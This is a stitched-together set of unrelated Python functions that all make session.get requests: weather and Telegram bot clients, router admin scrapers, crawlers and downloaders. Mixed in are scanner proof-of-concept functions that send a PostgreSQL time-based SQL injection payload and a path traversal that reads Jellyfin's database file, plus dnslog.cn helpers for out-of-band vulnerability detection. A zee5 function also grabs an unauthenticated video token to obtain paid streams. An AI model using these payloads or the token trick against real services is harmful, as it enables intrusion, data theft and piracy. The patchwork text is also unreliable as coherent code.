def dnslog_getdomain(self, session): url = 'http://www.dnslog.cn/getdomain.php?t=0' try: res = session.get(url, verify=False, timeout=10) return res.text except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e)
def call_place(self, session, place, states: dict): ''' Makes an API call with the name of a place provided - Args: - place: name to consult - session: from `requests.session`, allows it to run inside an async function - states (`dict`): cointaining the cache - Prints: - Today's weather forecast data ''' ow_url = 'https://api.openweathermap.org/data/2.5/weather?q={}&exclude=minutely,hourly&appid={}&units=metric' response = None pl = unidecode.unidecode(place) if pl in states: print(place + '\n' + get_todays_forecast(pl) + '\n') return get_todays_forecast(pl) with session.get(ow_url.format(place, self.__api)) as response: if response.status_code != 200: return None try: to_save = save(response, pl, dir='./Data/set2') more = {pl: to_save['dt']} states.update(more) print(place + '\n' + get_todays_forecast(pl) + '\n') return get_todays_forecast(pl) except: print('Cant request a forecast for ' + place + '\n') return None
def call_coordinates(self, session, place, states: dict): ''' Makes an API call with the coordinates of the IATA place provided - Args: - place: IATA code to consult - session: from `requests.session`, allows it to run inside an async function - states (`dict`): cointaining the cache - Prints: - Weather forecast data ''' ow_url = 'https://api.openweathermap.org/data/2.5/onecall?lat={}&lon={}&exclude=minutely,hourly&appid={}&units=metric' coordinates = self._iata.coordinates(place) response = None t = str(coordinates[0]) + '_' + str(coordinates[1]) if t in states: print(self._iata.place(place) + '\n' + get_full_forecast(t) + '\n') return get_full_forecast(t) with session.get( ow_url.format(coordinates[0], coordinates[1], self.__api)) as response: if response.status_code != 200: return None try: to_save = save(response, t) more = {t: to_save['current']['dt']} states.update(more) print(self._iata.place(place) + '\n' + get_full_forecast(t) + '\n') return get_full_forecast(t) except: print('Cant request a forecast for ' + self._iata.place(place) + '\n') return None
def sendVideo(chatId, video): # Check if the video was downloaded if (video == ".mp4") or (video == ""): sendMessage(chatId, "Não foi possível encontrar a url que você enviou :(") else: url = 'https://api.telegram.org/bot' + botToken + '/sendVideo' file = {'video': open(video, 'rb')} parameters = { 'chat_id': chatId # The file parameter is passed separately in the request } print('Enviado para o Telegram...') session = Session() try: response = session.get(url, params=parameters, files=file) data = json.loads(response.text) #print(json.dumps(data, indent=4, sort_keys=True)) except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
def fetch_dhcp_list(log=False): # fetches dhcp list & updates hostname map dhcp_leases = { "No.": [], "Hostname": [], "MAC": [], "IP": [], "Initial Lease": [], #"Expires in": [] } dhcp_response = session.get(dhcp_url).content.decode() dhcp_soup = BeautifulSoup(dhcp_response, 'html.parser') table_rows = dhcp_soup.find_all('tr')[1:] # table of dhcp leases for count, row in enumerate(table_rows): soup_table_data = BeautifulSoup(str(row), 'html.parser') row_data = [item.string for item in soup_table_data.find_all('td')] dhcp_leases['No.'].append(count+1) dhcp_leases['Hostname'].append(row_data[0]) dhcp_leases['MAC'].append(row_data[1]) dhcp_leases['IP'].append(row_data[2]) #dhcp_leases['Expires in'].append(row_data[3]) dhcp_leases['Initial Lease'].append( get_lease_initial_time(row_data[3])) host_names_from_mac[row_data[1].upper()] = row_data[0] host_names_from_ip[row_data[2]] = row_data[0] if log: if dhcp_leases['Hostname']: print(tabulate(dhcp_leases, headers="keys", tablefmt="psql"))
def read(self): session = self.__get_cookie() f = BytesIO() title_element = self.soup.find("b", {"class": "cut_line_one"}) # Maybe NavigableString? assert isinstance(title_element, Tag) self.title = title_element.text # css selecter is not working :( ep_num = self.soup.find( "span", { "style": "background-color:rgba(155,155,155,0.5);padding: 1px 6px;border-radius: 3px;font-size: 11px; margin-right: 3px;" }, ) assert isinstance(ep_num, Tag) ep_name = self.soup.find("span", {"class": "cut_line_one"}) assert isinstance(ep_name, Tag) # Dirty but for clean filename replaced_name = ep_name.text.replace(ep_num.text, "", 1) self.filenames[f] = clean_title(f"[{ep_num.text}] {replaced_name}.txt", "safe") # https://novelpia.com/viewer/:number: numbers: List[str] = [] numbers.append(self.__get_number(self.parsed_url[2])) # Get real contents # https://novelpia.com/proc/viewer_data/:number: # {"s": [{"text": ""}]} viewer_datas = map( lambda number: f"https://novelpia.com/proc/viewer_data/{number}", numbers) for viewer_data in viewer_datas: response = session.get(viewer_data) if response.text: response = response.json() for text_dict in response["s"]: text = text_dict["text"] if "img" in text: soup = Soup(text) img = soup.find("img") # Maybe NavigableString here too? assert isinstance(img, Tag) src = img.attrs["src"] filename = img.attrs["data-filename"] f.write(f"[{filename}]".encode("UTF-8")) self.urls.append(f"https:{src}") self.filenames[f"https:{src}"] = filename else: f.write(text_dict["text"].encode("UTF-8")) f.seek(0) self.urls.append(f) else: self.print_(f"{viewer_data} 해당 작품은 로그인이 필요합니다.")
def print_bandwidth_rules(get_disabled=False): def get_hostnames_from_ip_range(ip_range): start_ip, end_ip = int(ip_range.split('-')[0].split('.')[3]) , int(ip_range.split('-')[1].split('.')[3]) res = [] for ip in range(start_ip, end_ip+1): current_ip = "192.168.1." + str(ip) current_host = host_names_from_ip[current_ip] if host_names_from_ip.get(current_ip) else "continue" if current_host == "continue": continue res.append((current_host + f' ({current_ip})')) to_return = "" for i in res: to_return += i + "\n" return to_return bandwidth_response = session.get(bandwidth_url).content.decode() band_soup = BeautifulSoup(bandwidth_response, 'html.parser').find_all('script')[2].string[25:1000] query_list_raw = band_soup.split("'")[1].split(";") # parsing existing queries from js query_list = [] for q in query_list_raw: if q: query_list.append(q) queries = [Bandwidth_query(elem) for elem in query_list] query_table_data = { 'No.': [], 'Description': [], 'Hostname': [], 'IP (Range)': [], 'Up Speed': [], 'Down Speed': [], } if get_disabled: query_table_data['Enabled'] = [] count = 1 for query in range(len(queries)): if queries[query].enabled or get_disabled: query_table_data['No.'].append(count) count += 1 query_table_data['Description'].append(queries[query].description) if get_disabled: query_table_data['Enabled'].append(queries[query].enabled) query_table_data['IP (Range)'].append(queries[query].ip if queries[query].ip else queries[query].ip_range) query_table_data['Up Speed'].append(queries[query].upspeed) query_table_data['Down Speed'].append(queries[query].downspeed) if queries[query].ip and host_names_from_ip.get(queries[query].ip): query_table_data['Hostname'].append(host_names_from_ip[queries[query].ip]) elif get_hostnames_from_ip_range(queries[query].ip_range): query_table_data['Hostname'].append(get_hostnames_from_ip_range(queries[query].ip_range)) else: query_table_data['Hostname'].append('No clients') if not get_disabled: # remove no client rules for i in query_table_data: query_table_data[i].pop() if len(query_table_data['No.']) == 0: print('No bandwidth control rules are set') else: print(tabulate(query_table_data, headers='keys', tablefmt='psql'))
def erpnext_jobs_sync(): # Get settings doctype erpnext_jobs_settings = frappe.get_doc("ERPNext Jobs Settings") if not erpnext_jobs_settings: return # Get username, password and url from the settings doctype username = erpnext_jobs_settings.username password = erpnext_jobs_settings.get_password("password") url = erpnext_jobs_settings.url jobs_url = erpnext_jobs_settings.jobs_url job_contact_url = erpnext_jobs_settings.job_contact_url company = erpnext_jobs_settings.company if not (username and password and url and jobs_url and job_contact_url and company): frappe.msgprint("Check ERPNext Job Settings") return # Login and return the session for further calls session = __erpnext_login_and_return_session(username, password, url + "/api/method/login") if not session: frappe.msgprint("Unable to create Session") return # Get Job pade HTML response = session.get(url=jobs_url) total_added = 0 if response.ok: job_link_wise_data = {} job_links = __get_job_links_from_html(response.text) frappe.msgprint("Found %s job links" % len(job_links)) for job_link in job_links: job_data_response = session.get(job_contact_url + "/" + job_link) if job_data_response.ok: job_data = __get_data_from_job_page(job_data_response.text) added_new = __create_lead_if_does_not_exist( job_contact_url + "/" + job_link, job_data, company) if added_new: total_added = total_added + 1 frappe.msgprint("Added %s New Jobs" % (total_added))
def remove_rule(): ran = random.randrange(10000, 9999999) def validate_inp(text): values = text.split(" ") try: for i in values: num = int(i) if (num < 1) or (num > len(query_list)): return -1 except ValueError: return -1 return 1 print_bandwidth_rules(get_disabled=True) bandwidth_response = session.get(bandwidth_url).content.decode() band_soup = BeautifulSoup(bandwidth_response, 'html.parser').find_all('script')[2].string[25:1000] rule_string = band_soup.split("'")[1] query_list_raw = band_soup.split("'")[1].split(";") query_list = [] for q in query_list_raw: # filter empty strings from raw if q: query_list.append(q) if not query_list: print('No bandwidth control rules are set') return inp = input('Enter rule numbers to delete seperated by a space >>') final_q_list = [] if validate_inp(inp) != -1: remove_indexes = [int(i)-1 for i in inp.split(" ")] for i in range(len(query_list)): if not i in remove_indexes: final_q_list.append(query_list[i]) res_string = "" for i in range(len(final_q_list)): if i == 0: res_string += final_q_list[i] continue res_string += f";{final_q_list[i]}" command_url = root_url + f"bondwidctr.cmd?enblQos=1&qosList={res_string}&sessionKey={ran}" session.get(command_url) print('Rule(s) removed successfully') return print('Invalid number')
def dnslog_getrecords(self, session, target_url, domain, count): url = 'http://www.dnslog.cn/getrecords.php?t=0' try: res = session.get(url, verify=False, timeout=10) except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) if domain in res.text: if count == 0: print(f'[+] 获取到{domain}信息,目标 {target_url} 可能存在漏洞') else: print(f'[{str(count)}] 获取到{domain}信息,目标 {target_url} 可能存在漏洞')
def show_session(sid, uid): session = api_call(args.ip, 443, "show-session", {"uid": uid}, sid) return { 'type': session.get("type"), "changes": session.get("changes"), "mode": session.get("connection-mode"), "locks": session.get("locks"), "publish-time": session.get("publish-time"), "state": session.get("state"), 'creator': session.get('creator'), 'ip-address': session.get('ip-address'), 'uid': uid }
def main(): url = "https://www.google.com/" res = requests.get(url, proxies=proxies) print(res) print(res.url) print(res.headers) print(res.status_code) print(res.text) with get_session() as session: res = session.get(url, proxies=proxies) res.raise_for_status() print(res)
def testBot(): url = 'https://api.telegram.org/bot' + botToken + '/getMe' session = Session() try: response = session.get(url) data = json.loads(response.text) print(json.dumps(data, indent=4, sort_keys=True)) except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
def create_session(test_ip=True): max_threads = multiprocessing.cpu_count() session = requests.Session() proxies = {'http': 'socks5h://'+proxy, 'https': 'socks5h://'+proxy} if proxy: session.proxies = proxies session.mount( 'https://', HTTPAdapter(pool_connections=max_threads, pool_maxsize=max_threads)) if test_ip: ip = session.get('https://checkip.amazonaws.com').text.strip() print("Session IP: "+ip) return session
def zee5(official_link): session = requests.Session() official_link_trim = official_link.split("/")[-1] res = session.get("https://gwapi.zee5.com/content/details/" + official_link_trim + "?translation=en&country=IN&version=2") res_json = json.loads(res.text) try: res_customization = res_json["video_details"]["hls_url"].split('/') except: print("\n") print(Fore.LIGHTRED_EX + "XXXX--Invalid Url or playlist provided!--XXXX") deinit() exit() hls_value = modified_url(res_customization[1]) finalizing_link = "/".join(res_customization[2:]) #res2 = session.get("https://useraction.zee5.com/token/platform_tokens.php?platform_name=web_app") #print(res2.text) #prints the authorization token without any authorization. res3 = session.get("http://useraction.zee5.com/tokennd/") #print(res3.text) #returns valid hmac token with timestamp res3_text = res3.json() video_token = res3_text["video_token"] print("\n") print(Fore.LIGHTGREEN_EX + "Authorized URL to stream:") link = "https://zee5vodnd.akamaized.net/" + hls_value + finalizing_link + video_token print(Fore.LIGHTBLUE_EX + link) print("\n") print(Fore.LIGHTRED_EX + 'Give damn credit to https://ttttt.me/believerseller Remember!!! ;)') print(Style.RESET_ALL)
def send_msg(date): with requests.session() as session: fin_end_point = url_for_findbydist+f"?district_id={district_id}&date={date}" response = session.get(url = fin_end_point,headers=headers) response = response.json() for session in response['sessions']: #For Age not equal to 45 and capacity is above zero if (session['min_age_limit'] != 45) & (session['available_capacity'] > 0): message_string=f"Subject: Alert'!! \n\n Available - {session['available_capacity']} in {session['name']} on {session['date']} for the age {session['min_age_limit']} and link https://www.cowin.gov.in/home " telegram_send.send(messages=[message_string])
def get_size(file_url): download_file = {} try: r = requests.get(file_url, headers=headers) download_file['URL'] = file_url download_file['Size'] = sizeof_fmt(int(r.headers['content-length'])) # download_file['Thumbnail']= return download_file except ConnectionError: session = proxify() r = session.get(file_url, headers=headers) download_file['URL'] = file_url download_file['Size'] = sizeof_fmt(int(r.headers['content-length'])) # download_file['Thumbnail']= return download_file except requests.exceptions.SSLError: session = proxify() r = session.get(file_url, headers=headers) download_file['URL'] = file_url download_file['Size'] = sizeof_fmt(int(r.headers['content-length'])) # download_file['Thumbnail']= return download_file
def download(file_url): identifier = file_url.split('/')[3] quality = file_url.split('/')[-1] file_name = identifier + '_' + quality if file_name.endswith('.mp4'): file_name = file_name else: file_name = file_name + '.mp4' with open(file_name, 'wb') as downloaded: session = proxify() r = session.get(file_url, headers=headers, stream=True) for data in r.iter_content(1024): downloaded.write(data)
def poc(self, target_url, session): url = f"{target_url}/api/dp/rptsvcsyncpoint?ccid=1';" payload = url + "SELECT PG_SLEEP(1)--" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' } try: res = session.get(url=payload, headers=headers, verify=False, timeout=10) return res except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e)
def poc(self, target_url, session): payload = '..\data\jellyfin.db' url = f"{target_url}/Audio/1/hls/{quote(payload)}/stream.mp3/" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' } try: res = session.get(url=url, headers=headers, verify=False, timeout=10) return res except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e)
def create_session(test_ip=True): session = requests.Session() proxies = {'http': f'socks5h://{proxy}', 'https': f'socks5h://{proxy}'} if proxy: session.proxies = proxies if cert: session.verify = cert max_threads2 = cpu_count() session.mount( 'https://', HTTPAdapter(pool_connections=max_threads2, pool_maxsize=max_threads2)) if test_ip: ip = session.get('https://checkip.amazonaws.com').text.strip() print("Session IP: "+ip) return session
def main(search): urlList = [] query = urllib.parse.quote_plus(search) session = HTMLSession() response = session.get('https://www.google.com/search?q=' + query) links = list(response.html.absolute_links) google_domains = ( 'https://www.google.', 'https://google.', 'https://webcache.googleusercontent.', 'http://webcache.googleusercontent.', 'https://policies.google.', 'https://support.google.', 'https://maps.google.', 'http://scholar.google.com', 'https://www.youtube.com', 'https://en.wikipedia.org', 'https://yt.be' ) for url in links[:]: if url.startswith(google_domains): links.remove(url) processes = [] queue = multiprocessing.Queue() for x in range(len(links)): p = multiprocessing.Process(target=sub,args=(links[x],queue)) processes.append(p) p.start() for p in processes: p.join() urlList = [queue.get() for p in processes] def n_sort(l): return (l.num) urlList = sorted(urlList, key=n_sort, reverse=True) urlList2 = [] #webbrowser.open_new(urlList[0].link) for l in urlList: if(l.num > 2): urlList2.append(l) return(urlList2)
def getChat(): url = 'https://api.telegram.org/bot' + botToken + '/getChat' chatId = input('Id: ') parameters = {'chat_id': chatId} session = Session() try: response = session.get(url, params=parameters) data = json.loads(response.text) print(json.dumps(data, indent=4, sort_keys=True)) except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
def getUpdates(): url = 'https://api.telegram.org/bot' + botToken + '/getUpdates' parameters = {'limit': '1', 'offset': '-1'} session = Session() try: response = session.get(url, params=parameters) data = json.loads(response.text)['result'] #print(json.dumps(data, indent=4, sort_keys=True)) return data except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
def authenticate(self, session: requests.Session): # Call any endpoint with HTTP Basic Auth and store the session cookie try: auth_response = session.get( url=f"{self.base_url}/restconf/data/v1/cisco-customer:customer", auth=(self.username, self.password)) if auth_response.status_code == 200: self.logger.info("Authentication Successful.") if auth_response.status_code == 401: self.logger.error( "Authentication Error. Check username and password.") except requests.exceptions.ConnectionError as e: self.logger.error( f"Connection Error. Cannot connect to {self.base_url}. Exception: {repr(e)}" ) except Exception as e: self.logger.error(f"Encountered unhandled exception: {repr(e)}")
def changeTitle(): title = input('New title: ') #chatId = input('Chat ID: ') url = 'https://api.telegram.org/bot' + botToken + '/setChatTitle' parameters = {'chat_id': '-563780415', 'title': title} session = Session() try: response = session.get(url, params=parameters) data = json.loads(response.text) print(json.dumps(data, indent=4, sort_keys=True)) except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
def sendMessage(chatId, message): if (chatId == -1) and (message == -1): chatId = input('Id: ') message = input('Mensagem: ') url = 'https://api.telegram.org/bot' + botToken + '/sendMessage' parameters = {'chat_id': chatId, 'text': message} session = Session() try: response = session.get(url, params=parameters) data = json.loads(response.text) #print(json.dumps(data, indent=4, sort_keys=True)) except (ConnectionError, Timeout, TooManyRedirects) as error: print(error)
def get_cookie(cfg): """ cookieを取得する """ # セッションを開始する session = requests.session() response = session.get(cfg['first_url']) #response.raise_for_status() cookie_sessionid = session.cookies.get(cfg['cookie_sessionid']) cookie_starturl = session.cookies.get(cfg['cookie_starturl']) cookies = { cfg['cookie_sessionid']: cookie_sessionid, cfg['cookie_starturl']: cookie_starturl } #print(f'{cookie_sessionid}:{cookie_starturl}') form_data = get_formdata(response) #type(response) #dir(response) #print(response.content) #print(response.text) return cookies , form_data
def _crawl_user_page(user_home_page_url): ua = UserAgent() headers = { 'authority': 'www.zhihu.com', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'upgrade-insecure-requests': '1', 'user-agent': ua.chrome, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'none', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '******', 'sec-fetch-dest': 'document', 'referer': r'https://www.baidu.com/s?wd=%E7%9F%A5%E4%B9%8E', 'accept-language': 'zh-CN,zh;q=0.9' } response = session.get(user_home_page_url, headers=headers) _html = response.text return _html
def print_wifi_clients(): wifi_clients = { "No.": [], "MAC": [], "Hostname": [] } wifi_clients_response = session.get(wifi_clients_url).content.decode() wifi_soup = BeautifulSoup(wifi_clients_response, 'html.parser') table_rows = wifi_soup.find_all('tr')[1:] for count, row in enumerate(table_rows): soup_table_data = BeautifulSoup(str(row), 'html.parser') row_data = [soup_table_data.find('td').string] wifi_clients['No.'].append(count+1) wifi_clients['MAC'].append(row_data[0]) wifi_clients['Hostname'].append( host_names_from_mac[row_data[0].strip().upper()]) if wifi_clients['MAC']: print(tabulate(wifi_clients, headers="keys", tablefmt="psql")) else: print('No device is connected to the network through WiFi')